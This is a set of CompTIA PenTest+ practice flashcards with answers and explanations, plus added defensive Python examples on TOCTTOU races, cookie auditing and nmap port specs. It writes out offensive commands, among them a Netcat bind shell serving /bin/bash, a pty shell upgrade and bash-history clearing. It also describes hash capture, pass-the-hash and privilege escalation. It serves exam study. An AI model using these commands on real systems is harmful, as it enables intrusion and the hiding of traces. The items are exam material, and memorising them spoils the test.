CompTIA PenTest+ Practice Test Chapter 7 Practice Exam 2 (Sybex: Panek, Crystal, Tracy) Flashcards

1
Q

You are a penetration tester, and you are conducting a test for a new client. The client wants you to review a new web application for availability. Which type of attack should the tester utilize?

A.TCP SYN flood
B.SQL injection
C.Cross-site scripting (XSS)
D.XMAS scan

A

A.TCP SYN flood

Explanation:
A TCP SYN flood (also known as a SYN flood) is a form of denial of service (DoS) attack in which a tester sends a succession of SYN segments to the target in an attempt to consume enough server resources to make the system unresponsive to genuine traffic. It abuses the normal TCP three-way handshake: the server allocates connection state for every half-open connection while it waits for the final ACK, which the attacker never sends, so the backlog fills and legitimate clients are refused. SQL injection and XSS attack confidentiality and integrity rather than availability, and an XMAS scan is a port-scanning technique, not an attack on availability.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 348). Wiley. Kindle Edition.


2
Q

You are a penetration tester, and you are conducting a test for a new client. You are conducting a scan of your client’s web application. During the review of the scan results, which of the following vulnerabilities would be the most critical and should be prioritized for exploitation?

A.Clickjacking
B.Expired certificate
C.Full path disclosure
D.Stored cross-site scripting (XSS)

A

D.Stored cross-site scripting (XSS)

Explanation:
Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Stored XSS occurs when a web application gathers input from a user that might be malicious, stores that input in a data store, and later renders it to other users without output encoding, so the payload executes in the browser of every visitor who views the affected page. Clickjacking, an expired certificate, and full path disclosure are lower-severity findings by comparison.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 348). Wiley. Kindle Edition.

3
Q

You are a penetration tester, and you are conducting a test for a new client. The client has asked you to conduct a test on a web application. You discover that the user login process sends form field data by using the HTTP GET method. To reduce the risk of exposing sensitive data, the HTML form should be sent using which method?

A.The HTTP OPTIONS method
B.The HTTP POST method
C.The HTTP PUT method
D.The HTTP TRACE method

A

B.The HTTP POST method

Explanation:
Forms in HTML can use either method="POST" or method="GET" (the default) in the <form> element. The method determines how form data is submitted to the server. With GET, the parameters become part of the URL, so they remain in the browser history and typically also end up in web server and proxy logs and in the Referer header of subsequent requests. With POST, the parameters travel in the request body and are not saved in browser history. GET is therefore less secure than POST for sensitive fields such as credentials; in either case the form must be submitted over HTTPS, since POST by itself does not encrypt anything.

4
Q

You are a penetration tester, and you are conducting a test for a new client. You and the client are having a discussion regarding race condition exploitation. Which of the following is an example of race condition?

A.Cross-site request forgery (XSRF)
B.Hard-coded credentials
C.SQL injection (SQLi)
D.Time of check to time of use (TOCTTOU)

A

D.Time of check to time of use (TOCTTOU)

Explanation:
Race conditions occur when the security of a code segment depends upon the sequence or timing of events within the system. The time-of-check-to-time-of-use (TOCTTOU, also written TOCTOU) issue is a race condition that occurs when a program checks a resource (for example, a file's permissions or whether a path is a symbolic link) and then uses that resource in a separate, later operation; an attacker who changes the resource between the check and the use can make the program act on something other than what it checked.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 348). Wiley. Kindle Edition.
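Added worked example, not from the Sybex text: a Python simulation of the TOCTTOU race described above, with a check-then-use writer beside a hardened one. The file names, the swap() hook that stands in for the attacker winning the race, and the temporary directory are constructed for the example; the fix relies on O_NOFOLLOW and fstat(), which are POSIX facilities, so it runs on Linux and macOS but not on Windows.

```python
import errno
import os
import stat
import tempfile


def vulnerable_write(path, data, race=None):
    """Check-then-use writer: inspects the path, then reopens it by name.

    The symlink check and the open() are separate operations on the same
    path string, so the filesystem can change between them. `race` is a
    hook used below to simulate the attacker winning that window.
    """
    if os.path.islink(path):            # time of check
        return False
    if race is not None:
        race()                           # attacker swaps the path here
    with open(path, "w") as f:           # time of use: open() follows the symlink
        f.write(data)
    return True


def hardened_write(path, data, race=None):
    """Open first, then verify the open descriptor rather than the path.

    O_NOFOLLOW makes open() fail if the last path component is a symlink,
    and fstat() inspects the object actually opened, so a swap between any
    earlier check and the open cannot redirect the write.
    """
    if race is not None:
        race()                           # same race, but it no longer matters
    try:
        fd = os.open(path, os.O_WRONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    except OSError as e:
        if e.errno in (errno.ELOOP, errno.EMLINK):   # symlink refused by the kernel
            return False
        raise
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
            return False                 # not a plain file, or hard-linked elsewhere
        os.ftruncate(fd, 0)              # truncate only after the checks pass
        os.write(fd, data.encode())
        return True
    finally:
        os.close(fd)


def demo():
    """Run both writers against a symlink swap; returns what each one did."""
    with tempfile.TemporaryDirectory() as d:
        protected = os.path.join(d, "protected")   # file the program must never touch
        victim = os.path.join(d, "victim")         # file the program intends to write

        def reset():
            for p in (protected, victim):
                if os.path.lexists(p):
                    os.remove(p)
                with open(p, "w") as f:
                    f.write("original\n")

        def swap():
            # Attacker replaces the victim path with a symlink to the protected file.
            os.remove(victim)
            os.symlink(protected, victim)

        reset()
        vuln_ok = vulnerable_write(victim, "pwned\n", race=swap)
        with open(protected) as f:
            after_vuln = f.read()

        reset()
        hard_ok = hardened_write(victim, "pwned\n", race=swap)
        with open(protected) as f:
            after_hard = f.read()

        reset()
        plain_ok = hardened_write(victim, "pwned\n")   # no race: normal write succeeds
        with open(victim) as f:
            victim_after_plain = f.read()

    return {"vulnerable_wrote": vuln_ok, "protected_after_vulnerable": after_vuln,
            "hardened_wrote": hard_ok, "protected_after_hardened": after_hard,
            "hardened_plain_ok": plain_ok, "victim_after_plain": victim_after_plain}


if __name__ == "__main__":
    print(demo())
```

The vulnerable writer overwrites the protected file because the symlink appears after its check; the hardened writer refuses the symlink at open time and only ever writes to the descriptor it verified.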

5
Q

You are a penetration tester, and you are conducting a test for a new client. You are looking to start a session hijacking attack against your client’s web application. What information is important to obtain to ensure that your attack will be a success?

A.A session cookie
B.A session ticket
C.A username
D.A user password

A

A.A session cookie

Explanation:
Websites use HTTP cookies to maintain sessions over time. A tester who obtains a copy of a user's session cookie can present it to the application and impersonate the user's browser, hijacking the authenticated session and taking control of the account; a username or password is not needed because the cookie is the proof of authentication. Cookies used for authentication should be generated from a cryptographically random value long enough to resist guessing, transmitted only over encrypted channels, and set with the Secure, HttpOnly, and SameSite attributes so that they are not sent over plaintext HTTP, not readable by script, and not attached to cross-site requests.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 348). Wiley. Kindle Edition.
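Added example, not from the Sybex text: a small Python audit of Set-Cookie headers that reports the weaknesses a tester would list for a session cookie (missing Secure, HttpOnly or SameSite, a short value, a misused __Host- prefix, issuance over plaintext HTTP). The sample headers, the cookie names, and the 16-character minimum are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample headers for this example (not captured from any real site).
SAMPLE_HEADERS = [
    "sessionid=9f2c1e7a4b8d0c3f5e6a7b8c9d0e1f2a; Path=/; Secure; HttpOnly; SameSite=Lax",
    "JSESSIONID=ABC123; Path=/app",
    "__Host-auth=5d41402abc4b2a76b9719d911017c592; Path=/; Secure; HttpOnly; SameSite=Strict",
    "__Host-token=0123456789abcdef0123456789abcdef; Path=/; HttpOnly; SameSite=Lax; Domain=example.com",
]

MIN_SESSION_ID_LEN = 16   # assumption for this check: shorter values are flagged as guessable


def parse_set_cookie(header: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a Set-Cookie header into (name, value, attributes).

    Attributes are ';'-separated and case-insensitive (RFC 6265); flag
    attributes such as Secure and HttpOnly map to "". A leading
    'Set-Cookie:' label is tolerated so raw response lines can be passed in.
    """
    header = re.sub(r"^\s*set-cookie\s*:\s*", "", header, flags=re.I)
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header: str, over_tls: bool = True) -> List[str]:
    """Return the weaknesses a tester would report for one Set-Cookie header."""
    name, value, attrs = parse_set_cookie(header)
    findings: List[str] = []
    if "secure" not in attrs:
        findings.append("missing Secure: cookie is also sent over plaintext HTTP")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable by script, so XSS can steal it")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: attached to cross-site requests (CSRF risk)")
    if len(value) < MIN_SESSION_ID_LEN:
        findings.append(f"value is only {len(value)} characters: session ID may be guessable")
    if name.startswith("__Host-") and (
        "secure" not in attrs or attrs.get("path") != "/" or "domain" in attrs
    ):
        findings.append("__Host- prefix requires Secure, Path=/ and no Domain; browsers reject it otherwise")
    if not over_tls:
        findings.append("issued over plaintext HTTP: the value was exposed on the wire")
    return findings


def audit_all(headers: List[str], over_tls: bool = True) -> Dict[str, List[str]]:
    """Audit a list of Set-Cookie headers, keyed by cookie name."""
    return {parse_set_cookie(h)[0]: audit_set_cookie(h, over_tls) for h in headers}


if __name__ == "__main__":
    for cookie, problems in audit_all(SAMPLE_HEADERS).items():
        print(cookie, "->", problems or ["ok"])
```

Feed it the Set-Cookie lines from a login response (with over_tls=False if the response came over HTTP) and every non-empty list is a finding for the report.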

6
Q

A number of employees have recently become the victims of a phishing attack. They received an email that looked like it came from the president of the company. The email stated that the employees would receive disciplinary action if they did not do as the email indicated and click a link in the message. What principle of social engineering did the attacker use?

A.Authority
B.Fear
C.Scarcity
D.Social proof

A

A.Authority

Explanation:
Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker used the social engineering principle of authority. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 348). Wiley. Kindle Edition.

7
Q

You are a penetration tester, and you are conducting a test for a new client. You run the following from an exploited machine:

python -c 'import pty; pty.spawn("/bin/bash")'

What action are you performing?

A.You are creating a sandbox.
B.You are capturing the credentials.
C.You are removing the Bash history.
D.You are upgrading the shell.

A

D.You are upgrading the shell.

Explanation:
The pty module lets a penetration tester spawn a pseudoterminal, so that commands such as su, sudo, and ssh, which refuse to run without a controlling terminal, work inside a plain reverse or bind shell. To upgrade the shell, just run the command shown (use python3 where python is not on the path). su is a Unix command that stands for substitute user; it is used to execute commands with the privileges of another user account and, when executed, invokes a shell without changing the current working directory or the user environment. After spawning the pty, a tester typically backgrounds the shell, runs stty raw -echo on the attacking machine, foregrounds it again, and sets TERM (for example, export TERM=xterm) to get job control, tab completion, and a working Ctrl-C.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (pp. 348-349). Wiley. Kindle Edition.

8
Q

You are a penetration tester, and you are conducting a test for a new client. You have found a few unquoted service paths during your testing of the client’s network. How can you use these vulnerabilities to your advantage?

A.By attempting to crack the service account passwords
B.By attempting DLL hijacking attacks
C.By attempting to locate weak file and folder permissions
D.By attempting privilege escalation attacks

A

D.By attempting privilege escalation attacks

Explanation:
Privilege escalation attacks are frequently categorized into two major types: vertical and horizontal. Vertical escalation attacks focus on gaining higher privileges. Horizontal escalation attacks move sideways to other accounts or services that have the same level of privileges. An unquoted service path is a Windows misconfiguration: when a service's binary path contains spaces and is not surrounded by quotation marks, Windows resolves it ambiguously and tries each candidate in turn (for C:\Program Files\My App\svc.exe it tries C:\Program.exe, then C:\Program Files\My.exe, then the real binary). If a tester can write to one of the directories on that path, a binary dropped there runs with the service's privileges, often LocalSystem, the next time the service starts. A quick check is wmic service get name,pathname,startmode (or Get-CimInstance Win32_Service in PowerShell) and looking for paths that contain spaces but no quotes. The other options are separate techniques; the unquoted path itself is exploited for privilege escalation.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 349). Wiley. Kindle Edition.

9
Q

Recently, a user has noticed that their machine has been acting irregular over the past week. They have been experiencing input lag, and the system is acting sluggish. The user has found a few text files that appear to contain bits of their emails and some instant messenger conversations. The user runs a virus scan, but nothing was detected. What type of malware may be affecting this machine?

A.Backdoor
B.Keylogger
C.Ransomware
D.Rootkit

A

B.Keylogger

Explanation:
A keylogger is software or hardware that records the keys struck on a keyboard, usually without the user's knowledge. It can be useful as part of an ongoing exploitation process: capturing keystrokes provides insight into the actions taken by users and is a valuable source of credentials, account information, credit card numbers, and other private data. In this scenario the text files containing fragments of email and chat messages are the logger's output, the input lag and sluggishness are its overhead, and a signature-based virus scan can miss a custom or little-known logger.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 349). Wiley. Kindle Edition.


10
Q

You are a penetration tester, and you are conducting a test for a new client. You have been asked to assess your client’s physical security by gaining access into the corporate office. You are looking for a method that will allow you to enter the building during both business hours and after hours. What would be the most effective method for you to attempt?

A.Attempt badge cloning.
B.Attempt lock picking.
C.Attempt a lock bypass.
D.Attempt piggybacking.

A

A.Attempt badge cloning.

Explanation:
With badge cloning, the tester can clone the badge of a staff member to gain entry into the facility. One of the most common techniques is to clone radio-frequency identification (RFID) tags. Given this scenario of trying to obtain access both during business hours and after hours, badge cloning is the best option.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 349). Wiley. Kindle Edition.

11
Q

You are a penetration tester, and you are conducting a test for a new client. You are attempting a physical security assessment, and you want to use an “under-the-door-tool” during the test. Which of the following intrusion techniques should you use?

A.Egress sensor triggering
B.Lock bumping
C.Lock bypass
D.Lock picking

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 234). Wiley. Kindle Edition.

A

C.Lock bypass

Explanation:
Lock bypass is simply that: bypassing locks without picking them. In this scenario, the tester is attempting a physical security assessment with the use of an under-the-door tool, which goes underneath a door and pulls open a door handle from the inside.

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 349). Wiley. Kindle Edition.

12
Q

You and a colleague are discussing an upcoming physical security assessment. The discussion turns to mantraps. Which of the following types of physical security attacks does a mantrap utilize?

A.Impersonation
B.Lock picking
C.Piggybacking
D.Shoulder surfing

Panek, Crystal; Tracy, Robb. CompTIA PenTest+ Practice Tests (p. 234). Wiley. Kindle Edition.

A

C.Piggybacking

Explanation:
Piggybacking attacks rely on following employees in through secured doors or other entrances. A high-security organization may use mantraps to prevent piggybacking and tailgating. A properly implemented mantrap will allow only one person through at a time, and that person will have to unlock two doors, only one of which can be unlocked and opened at a time.

13
Q

You are a penetration tester, and you are completing a test for a new client. You run the chkconfig --del command at the end of an engagement. Why did you run this command?

A.To check for persistence
B.To enable persistence
C.To remove the persistence
D.To report persistence

A

C.To remove the persistence

Explanation:
chkconfig is a tool for managing which run levels a service starts in on SysV-init Linux distributions such as older Red Hat and CentOS releases; it can view or change a service's run-level configuration. chkconfig --del <service> removes the service's start and stop links from every run level, so it no longer starts at boot; running it at the end of an engagement removes persistence that the tester established earlier with chkconfig --add. On systemd-based distributions the equivalent cleanup is systemctl disable <unit>.

14
Q

You are a penetration tester, and you are completing a test for a new client. You have successfully exploited an application vulnerability and now need to remove the command history from the Linux session. What command will remove the command history?

A.$ cat history /clear
B.$ history -c
C.$ history --remove
D.$ rm -f ./history

A

B.$ history -c

Explanation:
Bash history keeps a record of the commands executed on the Linux command line, which lets a user rerun previous commands by scrolling with the up and down arrow keys. The main reason for removing command-line history at the end of a session is to prevent another user from seeing the tester's previous commands. To delete all entries from the current session's history, use the history command with the -c option: $ history -c. Note that -c clears only the in-memory list; the shell still writes that list to ~/.bash_history when it exits unless the file is cleared as well (history -c followed by history -w, or unset HISTFILE before exiting).

15
Q

You and a colleague are discussing different utilities that can be used when performing a penetration test. Which of the following is a utility that can be used on Windows systems to establish command-line access to the console of a remote Windows system, similar to the older Telnet client?

A.PsExec
B.Remote Login (Rlogin)
C.Remote Shell (RSH)
D.Virtual Network Computing (VNC)

A

A.PsExec

Explanation:
PsExec is a command-line tool that lets you execute processes on remote systems and redirect console applications’ output to the local system so that the applications appear to be running locally. It is a lightweight Telnet replacement that allows you to execute processes on other systems.

16
Q

You and a colleague are discussing different utilities that can be used when performing a penetration test. Which of the following will allow for remote management and data gathering and is installed on all Windows systems?

A.Samba (SMB)
B.Virtual Network Computing (VNC)
C.Windows Management Instrumentation (WMI)
D.Windows Remote Desktop (RDP)

A

C.Windows Management Instrumentation (WMI)

Explanation:
Windows Management Instrumentation (WMI) allows for remote management and data gathering and is installed on all Windows systems, making it an attractive target for attackers and penetration testers. WMI provides users with information about the status of local or remote computer systems. It also supports actions such as the following:

  • The configuration of the security settings
  • The system properties
  • The permissions for authorized users and user groups
  • The drive labels
  • The scheduling of processes to run at specific times
  • Backing up the object repository
  • Enabling or disabling error logging

WMI can also allow the remote execution of commands, file transfers, and data gathering from files and the Registry.

17
Q

You are a penetration tester, and you are conducting a test for a new client. You want to use nmap to scan a remote system. You use the following command:

nmap 142.78.32.0/24

How many TCP ports will you be scanning?

A.256
B.1,000
C.1,024
D.65,535

A

B.1,000

Explanation:
Using nmap's basic functionality is quite simple: port scanning a system requires only that nmap be installed and that you provide the target's hostname, IP address, or network range. By default nmap scans the 1,000 most commonly used TCP ports on each target (taken from the frequency data in its nmap-services file); UDP ports are scanned only when -sU is specified, in which case it uses the 1,000 most common UDP ports as well. The full range of ports available to each protocol is 1-65535. In this scenario no port list was given, so nmap scans the default 1,000 TCP ports, and since 142.78.32.0/24 covers 256 addresses it does so against each host that responds.

18
Q

You are a penetration tester, and you are conducting a test for a new client. You run the following nmap scan on a computer: nmap -sV 192.168.10.5. The client has indicated that they have disabled Telnet in their environment. However, the nmap scan results show that port 22 is closed and that port 23 is open and identified as SSH. What might have caused this?

A.The organization did not disable Telnet.
B.The nmap results contain a false positive for port 23.
C.The service is running on a nonstandard port.
D.Port 22 is filtered.

A

A.The organization did not disable Telnet.

Explanation:
Network Mapper (nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. It identifies what devices are present, which hosts and services are available, which ports are open, and where security risks may exist. In this scenario, the client did not disable Telnet because TCP port 23, the port on which the Telnet server application (telnetd) listens by default, is still open. Telnet is a client-server protocol carried over a reliable, connection-oriented transport (TCP). A practitioner should confirm what is actually listening before reporting, because -sV labels a port by the banner it observes rather than by the port number: a manual banner grab such as nc -nv 192.168.10.5 23 will show an SSH-2.0 banner if SSH has simply been moved to port 23.
19
Q

You are a penetration tester, and you are conducting a test for a new client. You plan on using an hping command to send traffic to a remote system. What type of traffic will the remote system see if you use the script

hping remoteclient.com -S -V -p 80?

A.HTTP traffic to TCP port 80
B.HTTPS traffic to TCP port 80
C.TCP SYNs to TCP port 80
D.TCP three-way handshake to TCP port 80

A

C.TCP SYNs to TCP port 80

Explanation:
Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

20
Q

You are a penetration tester, and you are conducting a test for a new client. You plan on using nmap. Which nmap switch must you use if you want to scan all the TCP ports on an identified device?

A.-p- 1-65535
B.-p ALX,
C.-p 1-65544
D.-port 1-65534

A

A.-p- 1-65535

Explanation:
Nmap is the most widely used command-line port scanner and is a free, open source tool (its NSE scripts also give it some vulnerability-checking capability). It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. To choose which ports to scan, use -p (only scan specified ports); this overrides the default list of the 1,000 most common ports. Individual port numbers or ranges are acceptable, with ranges written with a hyphen (for example, 1-1023). The beginning and/or end value of a range may be omitted, in which case nmap uses 1 and 65535 respectively, so -p- scans every port from 1 through 65535 and is shorthand for -p 1-65535. The other options are not valid nmap syntax, and 65544 is outside the port range. Port scanning a system simply requires that nmap be installed and that you provide the target system's hostname or IP address.
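Added example, not from the Sybex text or from nmap's own code: a Python parser for the -p port specification as described above. It implements the comma-separated items, hyphenated ranges, and the omitted-start/omitted-end defaults of 1 and 65535, and goes slightly beyond the text by also handling nmap's T:/U: protocol qualifiers, which apply to every item that follows them until the next qualifier; service names such as -p http are not supported. Treating unqualified items as TCP assumes a TCP-only scan, and a range like 1-65544 is rejected the same way nmap rejects it.

```python
MAX_PORT = 65535


def expand_port_spec(spec: str):
    """Expand an nmap -p specification into a sorted list of (proto, port).

    Rules: comma-separated items, each a single port or a range 'a-b';
    an omitted range start means 1 and an omitted end means 65535, so
    '-' alone is every port. A 'T:' or 'U:' prefix switches the protocol
    for that item and all later items until the next prefix. Items before
    any prefix are assumed to be TCP (a TCP-only scan).
    """
    ports = set()
    proto = "T"
    for item in spec.split(","):
        item = item.strip()
        if not item:
            raise ValueError("empty port item")
        if ":" in item:
            prefix, item = item.split(":", 1)
            prefix = prefix.upper()
            if prefix not in ("T", "U"):
                raise ValueError(f"unknown protocol qualifier {prefix!r}")
            proto = prefix
            item = item.strip()
        if "-" in item:
            lo_s, hi_s = item.split("-", 1)
            lo = int(lo_s) if lo_s else 1          # '-N' means 1-N
            hi = int(hi_s) if hi_s else MAX_PORT   # 'N-' means N-65535
        else:
            lo = hi = int(item)
        if not (0 <= lo <= hi <= MAX_PORT):
            raise ValueError(f"bad port range {item!r}: ports run 0-{MAX_PORT}")
        for port in range(lo, hi + 1):
            ports.add((proto, port))
    return sorted(ports)


def port_count(spec: str) -> int:
    """Number of (protocol, port) pairs a given -p value would scan per host."""
    return len(expand_port_spec(spec))


if __name__ == "__main__":
    for s in ("-", "1-1023", "22,80,443", "U:53,111,T:22-25,80", "1-65544"):
        try:
            print(f"-p {s}: {port_count(s)} ports")
        except ValueError as e:
            print(f"-p {s}: rejected ({e})")
```

Multiply port_count() by the number of responding hosts to estimate the size of a scan before running it against a /24.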

21
Q

You are a penetration tester, and you are conducting a test for a new client. You plan on using nmap to conduct OS fingerprinting using a company provided text file that contains a list of all the IP addresses. What switches would you need to include in your code to conduct OS fingerprinting using the text file? (Choose two.)

A.-iL 
B.-O 
C.-oN 
D.-oX 
E.-sS 
F.-sV
A

A.-iL
B.-O

Explanation:
One of nmap's best-known features is remote OS detection using TCP/IP stack fingerprinting, enabled with -O: nmap sends a series of TCP, UDP, and ICMP probes to the remote host and compares the responses against its nmap-os-db signature database. -iL <file> reads the list of target hosts or networks from a file, which is what the company-provided text file calls for (for example, nmap -O -iL targets.txt). -sV probes open ports to determine service and version information; it fingerprints services, not the operating system, so it is not the switch this question asks for. -oN and -oX control the output format and -sS selects a SYN scan.

22
Q

You are a penetration tester, and you are conducting a test for a new client. You want to perform passive reconnaissance on the client’s external domain. What would be the best choice for you to use?

A.CeWL
B.OpenVAS
C.Peach
D.Shodan

A

D.Shodan

Explanation:
Passive reconnaissance is also known as open-source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.

23
Q

You are a penetration tester, and you are conducting a test for a new client. You have successfully exploited a DMZ server that has a service listening on a port. You want to forward that traffic back to a device you control. What are the best tools to do this? (Choose two.)

A.Cain and Abel 
B.Netcat 
C.Nmap 
D.Secure Shell (SSH) 
E.Tcpdump 
F.Wireshark
A

B.Netcat
D.Secure Shell (SSH)

Explanation:
In this scenario, the tools that can actually relay or tunnel traffic are Netcat and SSH. Secure Shell (SSH) provides remote shell access over an encrypted connection, typically on TCP port 22, and is found on devices and systems of all types; its port-forwarding options (-L for local, -R for remote, and -D for dynamic SOCKS forwarding) tunnel traffic from a port on one system to a port reachable from another, which is exactly what is needed to bring a DMZ service back to the tester's device. Netcat can act as a simple relay or listener, piping a connection received on one port to another host and port. The remaining options only observe or probe traffic: Wireshark and tcpdump are protocol analyzers that capture and dissect packets (Wireshark can also capture from wireless interfaces), Nmap is a port scanner, and Cain and Abel is a Windows credential-recovery and sniffing tool; none of them forwards traffic.

24
Q

You are a penetration tester, and you are conducting a test for a new client. You are conducting a test and have compromised the client’s host. What is the correct syntax to create a Netcat listener on this device?

A.nc -lp 4444 -e /bin/bash
B.nc -lvp 4444 /bin/bash
C.nc -p 4444 /bin/bash
D.nc -vp 4444 /bin/bash

A

A.nc -lp 4444 -e /bin/bash

Explanation:
Netcat can be used to set up a simple remote shell listener in a matter of seconds. You specify the program you want Netcat to run when a connection arrives with the -e parameter. In this scenario, the proper syntax is nc -lp 4444 -e /bin/bash, which listens on TCP port 4444 and hands the connecting client an interactive bash shell (on a Windows host the equivalent is nc.exe -lp 4444 -e cmd.exe). The arguments are:

  • l: Specifies listen mode, for inbound connections
  • p: Specifies the port to listen on
  • e: Specifies the program to run once a connection is made (/bin/bash here, cmd.exe on Windows)
  • v: Be verbose, printing messages on standard error, such as when a connection occurs

Note that -e exists only in the traditional Netcat build (compiled with -e support) and in Nmap's ncat; the OpenBSD nc shipped by many Linux distributions omits it, in which case a named pipe (mkfifo) or socat is needed to achieve the same effect.
25
Q

You are a penetration tester, and you are conducting a test for a new client. You want to target the NetBIOS name service. Which of the following commands is the most likely to be used to exploit the NetBIOS name service?

A.arpspoof
B.burpsuite
C.nmap
D.responder

A

D.responder

Explanation:
Responder is a toolkit that answers NetBIOS Name Service (NBT-NS) queries, and also LLMNR and mDNS queries, from Windows systems on a network. It can target individual systems or an entire local network, letting a tester analyze name queries or respond to them while pretending to be the system the query was intended for; the victim then authenticates to the tester's machine, exposing NetNTLM hashes. arpspoof poisons ARP rather than name resolution, Burp Suite is a web proxy, and nmap is a scanner.

26
Q

You are a penetration tester, and you are conducting a test for a new client. You want to conduct open-source intelligence (OSINT) data collection from publicly available sources. Which of the following tools can you use? (Choose two.)

A.BeEF 
B.Dynamo
C.Maltego 
D.SET 
E.Shodan 
F.Wireshark
A

C.Maltego
E.Shodan

Explanation:
There are a variety of tools that assist with this OSINT collection:

Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine.

Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats.

Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts.

Nslookup tools help identify the IP addresses associated with an organization

Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.

Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.

theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization.

Whois tools gather information from public records about domain ownership.

27
Q

You are a penetration tester, and you are conducting a test for a new client. You want to capture user hashes on a Windows network. You want to gather broadcast messages and have the ability to authenticate with hashes once you have captured them. What tool should you use?

A.impacket
B.Metasploit
C.Responder
D.Wireshark

A

A.impacket

Explanation:
Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit’s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you’ve captured the messages.

28
Q

You are a penetration tester, and you are conducting a test for a new client. You want to perform a credential brute-force attack on a client’s application. Which tool should you use?

A.Hashcat
B.Hydra
C.John the Ripper
D.Peach

A

B.Hydra

Explanation:
In a credential brute-force attack, the tester tries to log in to the application with many username and password combinations, typically drawn from wordlists. Hydra is a brute-forcing tool that performs this password guessing online, against live network services and web login forms, whereas Hashcat and John the Ripper crack password hashes offline and Peach is a fuzzer.

29
Q

You are a penetration tester, and you are conducting a test for a new client. As a part of your penetration test, you need to establish an active connection to the computer systems and devices at your client’s location to enumerate and fingerprint them. Which of the following tools could you use to do this? (Choose two.)

A.Aircrack-ng
B.hping
C.nmap
D.whois

A

B.hping
C.nmap

Explanation:
The nmap and hping utilities can be used to actively enumerate and fingerprint target systems. Hping is a command-line tool that allows testers to artificially generate network traffic; it is popular because it allows you to create custom packets. Nmap is the most widely used command-line port scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Whois is a passive tool that gathers information from public records about domain ownership, and Aircrack-ng is a wireless suite that conducts replay and deauthentication attacks and can act as a fake access point; neither establishes an active connection to enumerate hosts.

30
Q

You are a penetration tester, and you are conducting a test for a new client. You want to use Metasploit. Which command will start the Metasploit database?

A.db_connect
B.db_init
C.msfconsole
D.msfvenom

A

C.msfconsole

Explanation:
Metasploit is launched by running msfconsole from the command line; on Kali Linux the script lives at /usr/share/metasploit-framework/msfconsole and is on the path. msfconsole connects to the framework's PostgreSQL database when it starts, which is what enables the db_ commands used to store hosts, services, and loot; the database itself is initialized and started with msfdb init (or msfdb start). db_init is not a Metasploit command, db_connect connects the console to an already running database, and msfvenom is the payload generator.

31
Q

You are a penetration tester, and you are conducting a test for a new client. You want to capture NTLM v2 hashes over the wire for use in a pass-the-hash attack. Which tool does not allow you to capture NTLM v2 hashes over the wire?

A.Ettercap
B.Mimikatz
C.Metasploit
D.Responder

A

B.Mimikatz

Explanation:
Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords, and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket. In this scenario, however, the question states “over the wire.” Mimikatz is the only tool that cannot be used that way.

32
Q

You are a penetration tester, and you are conducting a test for a new client. You have captured NTLM hashes and want to conduct a pass-the-hash attack. Unfortunately, you don’t know which systems on the network might accept the hash. What tool should you use to conduct the test?

A.Drozer
B.Hashcat
C.Hydra
D.Kismet

A

C.Hydra

Explanation:
Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

33
Q

